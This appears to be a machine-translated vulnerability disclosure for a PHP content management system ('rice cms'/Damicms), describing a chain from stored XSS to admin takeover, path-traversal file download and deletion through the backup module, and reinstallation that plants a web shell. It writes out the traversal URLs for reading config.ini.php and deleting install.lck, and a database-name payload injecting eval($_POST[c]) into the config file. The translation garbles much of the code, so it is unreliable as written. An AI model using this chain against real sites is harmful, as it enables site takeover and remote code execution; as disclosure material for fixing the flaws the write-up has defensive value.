Multiple vulnerabilities in rice cms combined into shell
First, let's talk about his xss.
Almost no filtering. (Register an account and modify user information)
Register an account first.
After the registration is successful, we will not care.
Wait for the Administrator to go to the background to view member information.
In this way, you can log on to the administrator account.
Download and delete any file.
Back up the database first (the database name is regular and can be cracked. Year, month, and day _ 4-digit random number _ 1. SQL)
Let's check the connection for downloading and deleting files.
? M = Backup & a = del & id = 20140817_9550_1. SQL
? M = Backup & a = down & id = 20140817_9550_1. SQL
Then I found the two functions.
// Download and restore public function down () {$ filepath = '. /Public/Backup /'. $ _ GET ['id']; if (file_exists ($ filepath) {$ filename = $ filename? $ Filename: basename ($ filepath); $ filetype = trim (substr (strrchr ($ filename ,'. '), 1); $ filesize = filesize ($ filepath); header ('cache-control: max-age = 31536000'); header ('expires :'. gmdate ('d, d m y h: I: s', time () + 31536000 ). 'gmt'); header ('content-Encoding: none'); header ('content-Length :'. $ filesize); header ('content-Disposition: attachment; filename = '. $ filename); header ('content-Type :'. $ filetype); re Adfile ($ filepath); exit;} else {$ this-> error ('error. The volume file is not found! ') ;}} // Delete the volume partition file public function del () {$ filename = trim ($ _ GET ['id']); @ unlink ('. /Public/Backup /'. $ filename); $ this-> assign ("jumpUrl", U ("Backup/restore"); $ this-> success ($ filename. 'deleted! ');}
Neither function is filtered.
Let's download the database configuration file.
http://localhost/admin.php?m=Backup&a=down&id=../Config/config.ini.php
After checking, we delete install. lck.
http://localhost/admin.php?m=Backup&a=del&id=../../install.lck
Then we will be prompted that install. lck has been deleted.
By re-installing cms, you can write shell.
// Modify the configuration file $ fp = fopen ($ source_file, "r"); $ configStr = fread ($ fp, filesize ($ source_file); fclose ($ fp ); $ configStr = str_replace ('localhost', $ dbhost, $ configStr); $ configStr = str_replace ('damidb', $ dbname, $ configStr ); $ configStr = str_replace ("'db _ user' => 'admin'", "'db _ user' => '{$ dbuser}'", $ configStr ); $ configStr = str_replace ("'db _ pwd' => 'admin'", "'db _ pwd' => '{$ dbpwd}'", $ configStr ); if ($ dbport! = '000000') {$ configStr = str_replace ("'db _ port' => '000000'", "'db _ port' => '{$ dbport }'", $ configStr) ;}$ fp = fopen ($ target_file, "w") or die ("<script> alert ('write configuration failed. Check whether $ target_file can be written! '); History. go (-1); </script> "); fwrite ($ fp, $ configStr); fclose ($ fp );
$ Source_file is a template configuration file saved for its cms,
Database Name
Damicms ', 1 => eval ($ _ POST [c]), 'xx' =>'
Effect
\ Public \ Config \ config. ini. php
Solution: enhanced Filtering